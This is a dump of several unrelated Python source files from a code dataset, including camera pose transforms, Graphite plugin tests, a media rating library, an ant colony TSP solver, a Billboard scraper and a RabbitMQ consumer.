datetime.datetime.now()\n_reloadtimeout = datetime.timedelta(0,300)\n\ndef pickle_and_call_helper(func_name, *args):\n arglist = pickle.dumps(args, protocol=2)\n data = getattr(proxy_connection.root, func_name)(arglist)\n data = pickle.loads(data)\n return data\n\ndef pickle_and_call(func_name, *args):\n global proxy_connection\n global _mark\n\n # when was the last time we queried the server?\n if (datetime.datetime.now() - _mark) > _reloadtimeout:\n # print \"Reloading due to timeout\"\n proxy_connection=rpyc.connect(PROXY_SERVER, 18866)\n\n _mark = datetime.datetime.now()\n\n return pickle_and_call_helper(func_name, *args)\n\nFUNC_NAMES = 'itemQuery query saveItem saveProp saveSeries'.split()\nFUNC_NAMES.append('block_itemQuery')\n\nfor name in FUNC_NAMES:\n locals()[name] = functools.partial(pickle_and_call, 
name)\n","sub_path":"research/utils/timescape_proxy_uat.py","file_name":"timescape_proxy_uat.py","file_ext":"py","file_size_in_byte":1098,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"291858867","text":"import numpy as np\n\n\ndef world_to_camera(poses_world, cam_par):\n \"\"\"\n Rotate/translate 3d poses from world to camera viewpoint\n \n Args\n poses_world: array of poses in world coordinates of size n_frames x n_dimensions\n cam_par: dictionary of camera parameters\n \n Returns\n poses_cam: poses in camera-centred coordinates\n \"\"\"\n \n if 'vis' in cam_par.keys():\n ids = [i for i in cam_par['vis'].astype(bool) for j in range(3)]\n poses_world = poses_world[:,ids]\n \n ndim = poses_world.shape[1]\n poses_world = np.reshape(poses_world, [-1, 3])\n \n assert len(poses_world.shape) == 2\n assert poses_world.shape[1] == 3\n \n poses_cam = np.matmul(cam_par['R'], poses_world.T).T + cam_par['tvec']\n poses_cam = np.reshape( poses_cam, [-1, ndim] )\n \n return poses_cam\n\n\ndef camera_to_world( poses_cam, cam_par ):\n \"\"\"\n Rotate/translate 3d poses from camera to world\n \n Args\n poses_cam: poses in camera coordinates\n cam_par: dictionary with camera parameters\n \n Returns\n poses_world: poses in world coordinates\n \"\"\"\n\n ndim = poses_cam.shape[1]\n \n poses_world = np.reshape(poses_cam, [-1, 3]).copy()\n poses_world -= cam_par['tvec']\n poses_world = np.matmul(np.linalg.inv(cam_par['R']), poses_world.T).T\n poses_world = np.reshape( poses_world, [-1, ndim] )\n \n return poses_world\n\n\ndef project_to_camera(poses, intr):\n \"\"\"\n Project poses to camera frame\n \n Args\n poses: poses in camera coordinates\n intr: intrinsic camera matrix\n \n Returns\n poses_proj: 2D poses projected to camera plane\n \"\"\"\n \n ndim = poses.shape[1]\n poses = np.reshape(poses, [-1, 3]) \n poses_proj = np.squeeze(np.matmul(intr, poses[:,:,np.newaxis]))\n poses_proj = poses_proj / poses_proj[:, [2]]\n poses_proj = poses_proj[:, :2]\n poses_proj = np.reshape( poses_proj, [-1, int(ndim/3*2)] )\n \n return poses_proj\n\n\ndef XY_coord(poses):\n \"\"\"\n Project 3d poses to XY plane\n \n Args\n poses: poses\n \n Returns\n poses_xy: poses projected to xy plane \n \"\"\"\n poses_xy = {}\n\n for key in poses.keys():\n t3d = poses[ key ]\n\n ndim = t3d.shape[1]\n XY = np.reshape(t3d, [-1, 3])\n XY = XY[:,:2]\n poses_xy[ key ] = np.reshape( XY, [-1, ndim//3*2] )\n \n return poses_xy\n\n\ndef Z_coord( poses):\n \"\"\"\n Project 3d poses to XY plane\n \n Args\n poses: poses\n \n Returns\n poses_xy: poses projected to xy plane \n \"\"\"\n \n poses_z = {}\n for key in poses.keys():\n t3d = poses[ key ]\n\n ndim = t3d.shape[1]\n Z = np.reshape(t3d, [-1, 3])\n Z = Z[:,2]\n poses_z[ key ] = np.reshape( Z, [-1, ndim//3] )\n\n return poses_z","sub_path":"examples/fly_tether/src/transform.py","file_name":"transform.py","file_ext":"py","file_size_in_byte":2837,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"248966485","text":"import os\nfrom boto3.dynamodb.conditions import Key\n\n\nclass TestsEsUtil:\n @classmethod\n def delete_alias(cls, elastic_search, alias_name):\n if elastic_search.indices.exists_alias(alias_name):\n indices = elastic_search.indices.get_alias(alias_name)\n\n for index in indices:\n elastic_search.indices.delete_alias(index, alias_name)\n elastic_search.indices.delete(index)\n\n @staticmethod\n def create_articles_index(elasticsearch):\n 
TestsEsUtil.remove_articles_index(elasticsearch)\n\n article_settings = {\n 'mappings': {\n 'article': {\n 'properties': {\n 'sort_key': {\n 'type': 'long'\n }\n }\n }\n }\n }\n elasticsearch.indices.create(index='articles', body=article_settings)\n\n @staticmethod\n def remove_articles_index(elasticsearch):\n elasticsearch.indices.delete(index='articles', ignore=[404])\n\n @staticmethod\n def sync_public_articles_from_dynamodb(dynamodb, elasticsearch):\n table = dynamodb.Table(os.environ['ARTICLE_INFO_TABLE_NAME'])\n query_params = {\n 'IndexName': 'status-sort_key-index',\n 'KeyConditionExpression': Key('status').eq('public')\n }\n articles = table.query(**query_params)\n for article in articles['Items']:\n elasticsearch.index(\n index='articles',\n doc_type='article',\n id=article['article_id'],\n body=article\n )\n elasticsearch.indices.refresh(index='articles')\n","sub_path":"tests/tests_common/tests_es_util.py","file_name":"tests_es_util.py","file_ext":"py","file_size_in_byte":1698,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"2709169","text":"# -*- coding: utf-8 -*-\n\nfrom copy import deepcopy\n\nfrom aioresponses import aioresponses\nfrom asynctest._fail_on import fail_on\nfrom asynctest.case import TestCase\nfrom asynctest.mock import patch, call\nfrom ddt import data, ddt, unpack\nfrom freezegun.api import freeze_time\n\nfrom alamo_common.test.utils import override_settings\nfrom alamo_worker.plugins.graphite import GraphitePlugin, GraphiteResult\nfrom alamo_worker.plugins.mixins import RESULT_UNKNOWN\nfrom alamo_worker.plugins.tests import make_graphite_response\n\nDUMMY_GRAPHITE_HOST = 'dummy.endpoint'\nDUMMY_RENDER_ENDPOINT = 'http://%s/render' % DUMMY_GRAPHITE_HOST\n\nCHECK = {\n \"id\": 1914,\n \"uuid\": 'some-uuid-1234',\n \"name\": \"Sample check\",\n \"description\": \"\",\n \"frequency\": \"300\",\n \"sources\": [{\n \"metric\": \"stats.tech.fake.*.metric\",\n 'name': 'graphite',\n 'type': 'graphite',\n }],\n \"triggers\": [\n {\n \"id\": 999,\n \"url\": \"http://example.com/\"\n \"#/999/entity/888/check/1914/?triggerId=999\",\n 'rule': 'graphite.values > 2 OR graphite.num_series < 2',\n\n \"enabled\": True,\n \"debounce\": \"0\",\n \"severity\": \"WARNING\",\n }\n ],\n \"tags\": [],\n \"integration_key\": \"5c70b0ec4c024dc6b64224xxxxx17df6\",\n \"environment\": \"test\",\n \"entity_id\": \"888\",\n \"entity_name\": \"testing\",\n \"service_id\": \"999\",\n \"service_name\": \"pl.allegro.transaction.returns\"\n}\n\n\n@ddt\nclass TestGraphitePlugin(TestCase):\n use_default_loop = False\n\n async def setUp(self):\n super().setUp()\n self.graphite = GraphitePlugin()\n\n @unpack\n @data(\n (make_graphite_response([], metric='a'), 1, 0),\n (make_graphite_response([None, None], metric='b'), 1, 0),\n (make_graphite_response([1, 1], metric='a'), 1, 1),\n (make_graphite_response([1, None, None, None], metric='a'), 2, 0),\n (make_graphite_response([1, None, None], metric='a'), 2, 1),\n )\n @patch('alamo_worker.plugins.graphite.aiostats')\n @fail_on(unused_loop=False)\n def test_graphite_result_num_series(self, series, freq, expected, *args):\n result = GraphiteResult(\n 'test',\n self.graphite.collect_result(series, freq, 'test')\n )\n self.assertEqual(result.num_series, expected)\n\n @unpack\n @data(\n {\n 'payload': make_graphite_response([2, 1, 1, 14, None, None]),\n 'metric_calls': [call('graphite.series.test.valid_data')]\n },\n {\n 'payload': make_graphite_response([None] * 3),\n 'metric_calls': 
[call('graphite.series.test.missing_data'),\n call('graphite.fail.test.null_in_series')]\n },\n {\n 'payload': [],\n 'metric_calls': [call('graphite.fail.test.no_results')]\n },\n {\n 'payload': make_graphite_response([200] * 5),\n 'metric_calls': [],\n },\n )\n @aioresponses(param='m')\n @patch('alamo_worker.plugins.graphite.aiostats')\n async def test_faketest(self, stats_mock, payload, metric_calls, m):\n graphite_check = deepcopy(CHECK)\n m.get(DUMMY_RENDER_ENDPOINT, payload=payload)\n\n await self.graphite.execute(\n graphite_check, graphite_check['sources'][0]\n )\n\n stats_mock.increment.incr.assert_has_calls(metric_calls)\n\n @aioresponses()\n async def test_invalid_response(self, aiomock):\n graphite_check = deepcopy(CHECK)\n\n aiomock.get(\n DUMMY_RENDER_ENDPOINT,\n status=400,\n payload=make_graphite_response([2, 1, 2, 14, None, None])\n )\n\n result = await self.graphite.execute(\n graphite_check, graphite_check['sources'][0]\n )\n self.assertEqual(result.name, 'graphite')\n\n self.assertEqual(result.status, RESULT_UNKNOWN)\n\n @aioresponses()\n async def test_add_meta(self, aiomock):\n self.maxDiff = None\n href = (\n DUMMY_RENDER_ENDPOINT +\n '?width=800'\n '&height=480'\n '&tz=Europe%2FWarsaw'\n '&from=11%3A12_20160101'\n '&until=12%3A12_20160101'\n '&target=stats.tech.fake.%2A.metric'\n '&target=threshold%280.0%2C+%22threshold+%3D+0.0%22%2C+red%29'\n )\n expected = [('graphite_url', 'link', href)]\n aiomock.get(\n DUMMY_RENDER_ENDPOINT,\n payload=make_graphite_response([2, 1, 2, 14, None, None])\n )\n check = deepcopy(CHECK)\n\n result = await self.graphite.execute(\n check, check['sources'][0]\n )\n with override_settings(GRAPHITE_RENDER_URL=DUMMY_RENDER_ENDPOINT):\n with freeze_time(\"2016-01-01 12:12:12\"):\n meta = result.build_meta()\n self.assertListEqual(meta, expected)\n\n @fail_on(unused_loop=False)\n def test_supported_types(self):\n self.assertListEqual(self.graphite.supported_types(), ['graphite'])\n\n @patch('alamo_worker.plugins.graphite.aiostats')\n @fail_on(unused_loop=False)\n def test_collect_result(self, mock_stats):\n graphite_data = [\n make_graphite_response([None] * 7, metric='bunny.a')[0],\n make_graphite_response(\n [None, None, 1, 3, None, 2, None] * 7, metric='bunny.b'\n )[0],\n ]\n plugin = GraphitePlugin()\n result = plugin.collect_result(graphite_data, 3, 'dev')\n expected = {'bunny.a': [], 'bunny.b': [3, 2]}\n self.assertEqual(result, expected)\n\n @aioresponses()\n async def test_health_check__healthy(self, aiomock):\n aiomock.get(DUMMY_RENDER_ENDPOINT, status=200)\n result = await self.graphite.healthy()\n self.assertEqual(result, ('graphite', True))\n\n @aioresponses()\n async def test_health_check__not_healthy(self, aiomock):\n aiomock.get(DUMMY_RENDER_ENDPOINT, status=500)\n result = await self.graphite.healthy()\n self.assertEqual(result, ('graphite', False))\n","sub_path":"alamo_worker/plugins/tests/test_graphite_plugin.py","file_name":"test_graphite_plugin.py","file_ext":"py","file_size_in_byte":6034,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"226089922","text":"time = 0 \nanswer = \"\" \nwhile answer != \"Mississippi\": \n print(\"What has 4 eyes but cannot see? 
\") \n print(\"Please entre the answer here:\") \n answer = input() \n time+=1 \n if answer == \"Mississippi\":\n if time <= 3:\n print(\"Well done, you solved my riddle within three guesses!Number of total times: %d times\"%(time)) \n else:\n print(\"Well down!You solve this riddle!Number of total times: %d times\"%(time))\n else:\n print(\"Number of %s times: %d times\"%('error',time)) \n","sub_path":"Riddle_Task/riddles_task3_MrF.py","file_name":"riddles_task3_MrF.py","file_ext":"py","file_size_in_byte":527,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"646293068","text":"import webbrowser\n\n\n# Media Class\nclass Media():\n\n \"\"\" The class Media contains the Basic Information about the media.\n Information like Title for the movie or tv series.\n The class also contains the method to show the media trailer.\n Attributes:\n mediaId: A reference Id,\n mediaType: TV or MOVIE,\n title: Title of the media,\n duration: Duration of the movie.\n In case or TV show the duration of the episodes,\n pgrating: The pg rating for the the movie or the tv show,\n cast: The case for this media,\n poster: The poster image url for the media,\n trailerurl:The youtube trainer url,\n media_storyline: The story line of the movie or the tv show,\n genres: The gerenes for the media\n viewer_rating: The rating information about he media\n \"\"\"\n\n def __init__(self, md_id, md_type, md_title, md_duration,\n md_pg_rating, md_cast, poster,\n md_trailer_url, media_storyline, media_genres):\n \"\"\"Constructor for class Media\n Attributes:\n md_id: A reference Id,\n md_type: TV or MOVIE,\n md_title: Title of the media,\n md_duration:Duration of the movie. In case of TV show\n the duration of the episodes,\n md_pg_rating: The pg rating for the the movie or the tv show,\n md_cast: The case for this media,\n poster: The poster image url for the media,\n md_trailer_url: The youtube trainer url,\n media_storyline:The story line of the movie or the tv show, and\n media_genres: The gerenes for the media\n \"\"\"\n self.media_id = md_id\n self.media_type = md_type\n self.title = md_title\n self.duration = md_duration\n self.pg_rating = md_pg_rating\n self.cast = md_cast\n self.poster_url = poster\n self.trailer_url = md_trailer_url\n self.story_line = media_storyline\n self.genres = media_genres\n self.viewer_rating = ViewerRating()\n\n def show_trailer(self):\n \"\"\"\n Opens the youtube trailer\n Arguments:\n None\n Returns:\n None\n \"\"\"\n webbrowser.open(self.trailer)\n\n\n# Rating class\nclass Rating():\n\n \"\"\"\n Individual rating class that containg the users review and ratings.\n Attribute:\n user_rating: A integer between 1 - 10\n user_review: A string containgin the users review\n user_name\n \"\"\"\n\n def __init__(self, usr_review=\"\", usr_rating=0, usr_name=\"\"):\n \"\"\"\n Constructor for the rating class\n Arguments:\n usr_review: A users review for the media\n usr_rating: A int between 1 - 10 for users rating for the media\n usr_name: A string user name\n \"\"\"\n self.user_rating = usr_rating\n self.user_review = usr_review\n self.user_name = usr_name\n\n\n# Viewer Ratings Class\nclass ViewerRating():\n\n \"\"\"\n ViewerRating the class containg the viewer ratings for any media\n Attributes:\n MAX_RATING: The maximum any media can be rated.\n current_rating: The current average rating.\n total_ratings: The total number of reviews or ratings present.\n current_revies: An array of te current reviews\n acerage_rating: The average rating for 
the media\n    \"\"\"\n    MAX_RATING = 10\n\n    def __init__(self):\n        temp_rating = Rating()\n        self.current_reviews = [temp_rating]\n        self.total_rating = len(self.current_reviews) - 1\n        self.average_rating = 0\n        self.adjust_ratings()\n\n    def add_rating(self, rating, review, username):\n        \"\"\"\n        Adds the review and rating for a media\n        Args:\n            rating: a number between 0 - 10\n            review: a string containing the review comments by the user\n            username: a string containing the user name who added the review\n        Returns:\n            The function returns nothing. If the rating passed is not\n            within the range, an appropriate error will be displayed\n        \"\"\"\n        # check and throw error if the rating is not in range\n        if int(rating) < 0 or int(rating) > 10:\n            print(\"Please Enter Rating Between [0 - 10]\")\n            return\n        else:\n            new_rating = Rating(review, rating, username)\n            self.current_reviews.insert(0, new_rating)\n            self.adjust_ratings()\n\n    def adjust_ratings(self):\n        \"\"\"\n        adjusts the average rating for this media\n        Args:\n            none\n        Returns:\n            nothing\n        \"\"\"\n        self.total_rating = len(self.current_reviews)\n        if self.total_rating == 0:\n            self.average_rating = 0\n            return\n        rating_sum = 0\n        for iReview in self.current_reviews:\n            # continue the loop and add up the ratings\n            rating_sum = rating_sum + iReview.user_rating\n        # calculate and set average rating\n        if self.total_rating == 1:\n            self.average_rating = rating_sum / self.total_rating\n        else:\n            self.average_rating = rating_sum / (self.total_rating-1)\n\n\n# The Movie Class\nclass Movie(Media):\n\n    \"\"\"\n    The class Movie that inherits the Media class and represents\n    a media type of movie\n    Attributes:\n        director: the name of the director of the movie\n        releaseYear: the year when the movie was released\n    \"\"\"\n\n    def __init__(self, md_id=1, media_title=\"\", media_duration=\"0\",\n                 media_pgrating=\"G\", media_cast=\"\", media_poster=\"\",\n                 media_trailerurl=\"\", media_storyline=\"\", media_genres=\"\",\n                 media_director=\"\", media_released=1900):\n        Media.__init__(self, md_id, \"MOVIE\", media_title,\n                       media_duration, media_pgrating, media_cast,\n                       media_poster, media_trailerurl, media_storyline,\n                       media_genres)\n        self.director = media_director\n        self.releaseYear = media_released\n\n    def addmediarating(self, rating, review, username):\n        \"\"\"\n        addmediarating setter method for the parent Media class;\n        sets a rating on the viewer_rating property\n        Arguments:\n            rating: rating given by the user\n            review: review comments by the user\n            username: user name of the reviewer\n        \"\"\"\n        self.viewer_rating.add_rating(rating, review, username)\n\n\n# TV Show Class\nclass TVShow(Media):\n\n    \"\"\"\n    The class TVShow that inherits the Media class and represents a media type\n    of TV show.\n    Attributes:\n        creator: The name of the creator of the TV show\n        episodes: The number of episodes that the TV show has.\n        no_of_seasons: The number of seasons for the TV show\n    \"\"\"\n\n    def __init__(self, md_id=1, media_title=\"\", media_duration=\"0\",\n                 media_pgrating=\"G\", media_cast=\"\", media_poster=\"\",\n                 media_trailerurl=\"\", media_storyline=\"\", media_genres=\"\",\n                 media_creator=\"\", media_aired=\"1990\", no_episodes=0,\n                 no_seasons=1):\n        Media.__init__(self, md_id, \"TVSHOW\", media_title, media_duration,\n                       media_pgrating, media_cast, media_poster,\n                       media_trailerurl, media_storyline, media_genres)\n        self.first_aired = media_aired\n        self.creator = media_creator\n        self.episodes = no_episodes\n        self.no_of_seasons = no_seasons\n\n    def addmediarating(self, rating, review, 
username):\n        \"\"\"\n        addmediarating setter method for the parent Media class;\n        sets a rating on the viewer_rating property\n        Arguments:\n            rating: rating given by the user\n            review: review comments by the user\n            username: user name of the reviewer\n        \"\"\"\n        self.viewer_rating.add_rating(rating, review, username)\n","sub_path":"src/MovieLib.py","file_name":"MovieLib.py","file_ext":"py","file_size_in_byte":8154,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
+{"seq_id":"527014792","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport heapq\nimport random\n\ndef creat_city(num, scale):\n    \"\"\"\n    input:\n        num: number of cities\n        scale: range of the city coordinates, x, y in (0, scale)\n    return:\n        V: set of city coordinates\n        E: adjacency (distance) matrix of the cities\n    \"\"\"\n    x = np.random.choice(scale, num)\n    y = np.random.choice(scale, num)\n\n    V = np.stack((x, y), axis=1)\n    inner = -2 * V.dot(V.T)\n    xx = np.sum(V ** 2, axis=1, keepdims=True)\n    E = xx + inner + xx.T\n    E = E ** 0.5\n    index = [i for i in range(num)]\n    # To keep ants from spinning in place, make the diagonal of the adjacency matrix as large as possible.\n    E[index, index] = 9999999\n    return V, E\n\ndef a_res(samples, m):\n    \"\"\"\n    :samples: [(item, weight), ...]\n    :m: number of selected items\n    :returns: [(item, weight), ...]\n    \"\"\"\n    # choose the next city to visit according to the probabilities\n\n    heap = []  # [(new_weight, item), ...]\n    for sample in samples:\n        wi = sample[1]\n        if wi==0:\n            continue\n        ui = random.uniform(0, 1)\n        ki = ui ** (1/wi)\n\n        if len(heap) < m:\n            heapq.heappush(heap, (ki, sample))\n        elif ki > heap[0][0]:\n            heapq.heappush(heap, (ki, sample))\n\n            if len(heap) > m:\n                heapq.heappop(heap)\n\n    return [item[1] for item in heap]\n\n\ndef possibility(eta, gamma, other_city, cur_city):\n    \"\"\"\n    Return the probability of moving from the start city to each candidate city; only cities with a path are returned\n    \"\"\"\n    alpha = 1\n    beta = 5\n    start_city = cur_city[-1]\n\n    t_i = gamma[start_city]  # pheromone concentration from start_city to each city\n    n_i = eta[start_city]  # heuristic value from start_city to each city\n\n    temp = t_i ** alpha * n_i ** beta\n    temp[cur_city] = 0\n    add = temp.sum()\n    p_ij = temp / add\n\n    return p_ij\n\ndef rotate(l, n):\n    '''\n    Rotate the list.\n    '''\n    return l[n:] + l[:n]\n\ndef get_path_dis(root, E):\n    \"\"\"\n    Get the total distance of the path.\n    \"\"\"\n    dis = E[root[:-1], root[1:]].sum()\n    return dis + E[root[0],root[-1]]\n\ndef ACS(V, E, M, num):\n    \"\"\"\n    Ant system\n    V: set of points\n    E: adjacency matrix, the connectivity between points\n    M: number of ants\n    num: number of iterations\n    \"\"\"\n    # related parameters\n    global_best_path = None  # current best path\n    global_best_dis = 99999999\n    cur_city = None\n    other_city = [i for i in range(len(V))]\n    lo = 0.5  # pheromone evaporation rate\n\n    # pheromone heuristic values\n    eta = 1 / E\n    eta[np.isinf(eta)] = 0\n\n    # pheromone concentration\n    E_mean = E[E > 0].mean()\n    gamma = np.full(E.shape, 1 / len(V))\n\n    V_index = [i for i in range(len(V))]\n\n    for i in range(num):\n        epoch_gamma = np.zeros_like(gamma)  # accumulated pheromone on each path in this round\n        local_best_path = None  # best path of the current iteration\n        local_best_dis = 99999999\n        for j in range(M):\n            cur_city = [j % len(V)]  # distribute the ants sequentially\n            other_city = [i for i in range(len(V))]\n            other_city.remove(cur_city[-1])\n            while other_city:\n                p_ij = possibility(eta, gamma, other_city, cur_city)\n\n                next_city = int(a_res(np.stack((V_index, p_ij), axis=1), 1)[0][0])\n\n                epoch_gamma[cur_city[-1], next_city] += gamma[cur_city[-1], next_city]\n                cur_city.append(next_city)\n                other_city.remove(next_city)\n            epoch_dis = get_path_dis(cur_city, E)\n            if epoch_dis < local_best_dis:\n                local_best_dis = epoch_dis\n                local_best_path = cur_city\n\n        if local_best_dis < global_best_dis:\n            global_best_dis = local_best_dis\n            global_best_path = local_best_path\n\n        gamma = (1 - lo) * gamma + epoch_gamma\n\n    best_path = rotate(global_best_path, global_best_path.index(0))\n\n    return 
best_path","sub_path":"Functions.py","file_name":"Functions.py","file_ext":"py","file_size_in_byte":3807,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"324534357","text":"import json, billboard, time\nfrom pymongo import MongoClient\nfrom datetime import datetime\nimport pandas as pd\nimport numpy as np\n\n\ndef run(date=None, verbose=1):\n \"\"\"\n Collects all Billboard Hot 100 data starting from the given date and\n iterating through previous dates.\n\n Args: \n date: string in 'YYYY-MM-DD' format to start at.\n verbose: 0 or 1, with 1 meaning more status messages will be printed.\n\n Returns: nothing. Puts the gathered data in a mongo DB named billboard and \n with collection name hot100.\n\n \"\"\"\n\n # initialize DB connection\n collection = MongoClient()[\"billboard\"][\"hot100\"]\n\n # initialize arguments and extend timeout\n kwargs = {\"name\": \"hot-100\", \"max_retries\": 5, \"timeout\": 120}\n if not date:\n date = billboard.ChartData(**kwargs).date\n\n while date:\n kwargs[\"date\"] = date\n\n # get billboard data through billboard.py\n chart = billboard.ChartData(**kwargs)\n\n # prep chart data for mongo\n weekdata = json.loads(chart.json())\n weekdata[\"_id\"] = weekdata[\"date\"]\n weekdata[\"scraped\"] = datetime.utcnow()\n\n # insert into mongo\n collection.insert_one(weekdata)\n\n if verbose:\n print(date)\n\n date = chart.previousDate\n time.sleep(2)\n\n\ndef clean():\n \"\"\"\n Cleans raw data from the billboard scraper and puts it in \n billboard.hot100filtered. Mostly simplifies the data to one row per \n artist-track combination with the highest position on the chart and the \n most number of weeks. \n\n Args: None\n\n Returns: None. Does leave the cleaned data in billboard.hot100filtered.\n \"\"\"\n\n # initialize db connections\n db = MongoClient().billboard\n hot100filtered = db[\"hot100filtered\"]\n hot100raw = db.hot100\n\n # get raw data into a dataframe\n df = pd.DataFrame(hot100raw.find()).drop(\n columns=[\"_id\", \"_max_retries\", \"_timeout\", \"name\", \"nextDate\", \"title\"]\n )\n\n # unpacks each chart into an array of date-artist-track-etc rows\n alltracks = []\n for row in df.values:\n date = row[0]\n for track in row[1]:\n track[\"date\"] = date\n alltracks.append(track)\n\n df = pd.DataFrame(alltracks)\n\n # removes duplicate artist-track rows\n df = (\n df.groupby([\"artist\", \"title\"])\n .agg({\"date\": min, \"peakPos\": max, \"weeks\": max}, axis=\"columns\")\n .reset_index()\n )\n\n # inserts rows to db\n for i in range(df.shape[0]):\n entry = df.iloc[i].to_dict()\n entry[\"peakPos\"] = int(entry[\"peakPos\"])\n entry[\"weeks\"] = int(entry[\"weeks\"])\n\n hot100filtered.insert_one(entry)\n","sub_path":"src/billboard_scraper.py","file_name":"billboard_scraper.py","file_ext":"py","file_size_in_byte":2676,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"639388397","text":"\"\"\"\n Convert json IDEA alerts to csv. 
Pass name of input file as argument.\n    Input file should contain one IDEA alert per line.\n    Output csv entries are printed to stdout.\n\"\"\"\n\nimport sys\nfrom SPMF.input.support.idea import Idea\n\n\ndef none_to_empty_str(o):\n    return str(o) if o else \"\"\n\n\ndef process_line(line):\n    idea = Idea(line)\n    return \",\".join(map(none_to_empty_str,\n                        [idea.id,\n                         idea.aggr_id,\n                         idea.time,\n                         idea.category,\n                         idea.source,\n                         idea.src_proto,\n                         idea.target,\n                         idea.tar_proto,\n                         idea.port,\n                         idea.conn_count,\n                         idea.sensor]))\n\n\ndef main(argv=None):\n    if argv is None:\n        argv = sys.argv[1:]\n    if len(argv) < 1:\n        print(\"Missing arguments - input file name\", file=sys.stderr)\n        return -1\n\n    file_name = argv[0]\n\n    # Load alerts\n    with open(file_name, 'r') as file:\n        for line in file:\n            print(process_line(line))\n\n\nif __name__ == '__main__':\n    status = main()\n    sys.exit(status)\n","sub_path":"json/to_csv.py","file_name":"to_csv.py","file_ext":"py","file_size_in_byte":1210,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
+{"seq_id":"97185341","text":"from kombu import Connection, Exchange, Queue, Consumer\nimport socket\nfrom datetime import datetime\nrabbit_url = \"amqp://user1:password1@134.221.121.65:5670/vhost1\" #proxy\nfrom kombu.log import get_logger\nfrom kombu.utils.debug import setup_logging\n\n\nlogger=get_logger(__name__)\nsetup_logging(loglevel=\"DEBUG\")\n\n\nconn = Connection(rabbit_url, heartbeat=10)\nexchange_adaas = Exchange(\"ex-adaas\", type=\"fanout\", durable=True)\nqueue_adaas_pri = Queue(\"q-adaas-pri\", exchange=exchange_adaas, durable=True)\n\ndef process_message(body, message):\n    #print(str(datetime.now()) + \" The body is {}\".format(body))\n    msg = str(datetime.now()) + \" {}\\n\".format(body)\n    print(msg)\n    with open(out_file, \"a+\") as text_file:\n        text_file.write(msg)\n    message.ack()\n    if \"EOT\" in body:\n        exit()\n\nconsumer = Consumer(conn, queues=queue_adaas_pri, callbacks=[process_message], accept=[\"text/plain\"])\n#consumer.consume()\n\ndef establish_connection():\n    revived_connection = conn.clone()\n    revived_connection.ensure_connection(max_retries=3)\n    channel = revived_connection.channel()\n    consumer.revive(channel)\n    consumer.consume()\n    return revived_connection\n\ndef consume():\n    new_conn = establish_connection()\n    while True:\n        try:\n            new_conn.drain_events(timeout=2)\n        except socket.timeout:\n            msg = str(datetime.now()) + \" checking heartbeat\\n\"\n            with open(out_file, \"a+\") as text_file:\n                text_file.write(msg)\n\n            print(msg)\n            new_conn.heartbeat_check()\ndef run():\n    while True:\n        try:\n            consume()\n        except conn.connection_errors:\n            msg = str(datetime.now()) + \" connection error\\n\"\n            with open(out_file, \"a+\") as text_file:\n                text_file.write(msg)\n            print(msg)\n\nout_file=\"/home/adaas/adaas_demo/q-pri\" + str(datetime.now()).replace(\" \",\"_\")\nrun()","sub_path":"adaas_consumer_pri.py","file_name":"adaas_consumer_pri.py","file_ext":"py","file_size_in_byte":1906,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
+{"seq_id":"289368862","text":"import math\nimport time\n\n\ndef fibonacci(n):\n    \"\"\"\n    Calculates the fibonacci sequence up until the provided nth entry.\n    :param n:\n    :return:\n    \"\"\"\n    if n <= 2:\n        return 1\n    return fibonacci(n-1) + fibonacci(n-2)\n\n\ndef ackermann(m, n):\n    if m == 0:\n        return n + 1\n    elif n == 0:\n        return ackermann(m - 1, 1)\n    else:\n        return ackermann(m - 1, ackermann(m, n - 1))\n\n\ndef factorial(n):\n    \"\"\"\n    This is just a wrapper 
to ensure arg name compatibility with our forms, why reinvent the wheel?\n \"\"\"\n return math.factorial(n)\n\n\ndef time_func(f, *args, **kwargs):\n \"\"\"\n :param f: Input function\n :param args: args to pass to input function\n :param kwargs: kwargs to pass to input function\n :return: Execution time in ms and return from input function\n \"\"\"\n start = time.time()\n ret = f(*args, **kwargs)\n end = time.time()\n\n return (end - start) * 1000, ret\n","sub_path":"api/tasks.py","file_name":"tasks.py","file_ext":"py","file_size_in_byte":924,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"603337464","text":"from django.conf.urls import url, include\n\nfrom . import views\n\napp_name = \"api\"\nurlpatterns = [\n url(r\"^$\", views.index, name=\"index\"),\n url(r'^user', views.user, name=\"user\"),\n url(r'^website$', views.website, name=\"website\"),\n url(r'^rate$', views.rate, name=\"rate\"),\n url(r'^report$', views.report, name=\"report\"),\n url(r'^comment$', views.comment, name=\"comment\"),\n url(r'^like_comment$', views.like_comment, name=\"like_comment\"),\n url(r'^favourite$', views.favourite, name=\"favourite\"),\n url(r'^category$', views.category, name=\"category\")\n]\n","sub_path":"api/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":575,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"398428205","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport tensorflow as tf\nimport numpy as np\nimport cx_Oracle\nimport configparser\nimport sys\nimport os\nimport json\nimport shutil\n\nos.environ['TF_CPP_MIN_LOG_LEVEL'] = '3'\ntf.logging.set_verbosity(tf.logging.ERROR)\n\nconfig = configparser.ConfigParser()\nmlroot = os.path.dirname(os.path.abspath(os.path.dirname(__file__)))\nconfig.read(mlroot + '\\\\config.ini')\n\nid = config['ORACLE']['ID']\npw = config['ORACLE']['PW']\nsid = config['ORACLE']['SID']\nip = config['ORACLE']['IP']\nport = config['ORACLE']['PORT']\n\nconnInfo = id + \"/\" + pw + \"@\" + ip + \":\" + port + \"/\" + sid\n\n#DB에서 training에 필요한 데이터 추출 후 